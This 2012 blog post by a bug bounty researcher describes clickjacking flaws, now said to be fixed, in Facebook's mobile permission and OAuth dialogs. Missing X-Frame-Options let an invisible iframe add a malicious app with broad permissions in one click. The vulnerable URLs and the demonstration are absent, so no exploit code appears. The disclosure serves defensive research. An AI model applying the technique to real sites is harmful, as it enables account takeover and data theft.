Tuesday, 21 August 2012

No XFO? It's time for Facebook Clickjacking

This post is the summary of the clickjacking bugs I reported for Facebook bug bounty program. All these bugs discussed here are now fixed. Attacker was able to add any malicious facebook app with any permissions to victims account just by one click. Vulnerable pages discussed below were lacking Anti-Clickjacking Protection such as X-Frame-Options header which renders the vulnerable page in iframe (invisible).

First bug I found was in permissions.request dialog on Facebook Mobile site. This dialog was used to add Facebook apps to authenticated user. A single click on "Allow" button would add the app to victim facebook profile.

The vulnerable link, which adds "Graph API Explorer" app, was:


Here "display" parameter was used to decide the apperance of the page based on values supplied. It has 3 values: page, wap & touch. Page display was mainly used in Facebook main site and wap & touch was for Facebook mobile site.

The next bug was the variation of the previous bug where the permissions.request dialog page was able to render in iframe with "display=wap" parameter. With this parameter, the page looks like Mobile facebook page in Facebook main site which was lacking the clickjakcing protection at that time. The vulnerable page for this was:


Till this I learned new things about these dialogs and was able to add any permissions to the app.

The last bug was about oauth dialog. This was again from Facebook Mobile site. The vulnerable page was:


Sadly this bug didn't win any bounty as Facebook said "This can't be protected with X-Frame-Options because it needs to be servable in an arbitrary iframe.".

Well, I developed my own process to find such bugs which helps me to identify them quickly.

All of these bugs will result in adding malicious app with unwanted permissions to victim's account only with single user click. These permissions includes access to email, status message and many other things.

Here is a small demonstration:

That's all. Hope you like this post. Suggessions, comments are welcome.

1 comment:

  1. nice catch.
    despite it needs to be served in arbitary iframe it still needs some protection. I think there should be a confirmation window when clikc allow(prompt), which cannot be invisible.